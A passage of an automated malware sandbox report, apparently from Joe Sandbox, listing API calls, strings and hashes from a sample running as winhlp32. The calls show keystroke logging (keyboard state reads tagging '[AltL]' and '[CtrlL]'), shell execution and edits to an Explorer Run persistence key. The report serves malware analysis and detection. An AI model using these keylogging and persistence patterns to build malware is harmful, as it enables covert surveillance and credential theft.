                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                    • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    • API String ID: 2086374402-949981407
                                    • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                    • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                    • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___initconout.LIBCMT ref: 0045555B
                                      • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    • API String ID: 3087715906-263838557
                                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                    • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                    • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%